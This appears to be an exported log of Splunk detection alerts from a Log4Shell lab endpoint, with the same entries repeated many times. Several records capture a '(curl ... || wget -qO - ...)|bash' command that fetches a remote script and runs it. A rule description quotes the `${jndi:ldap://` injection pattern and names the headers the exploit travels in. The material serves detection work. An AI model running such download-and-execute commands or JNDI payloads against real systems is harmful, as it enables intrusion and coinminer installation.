annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640653, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this 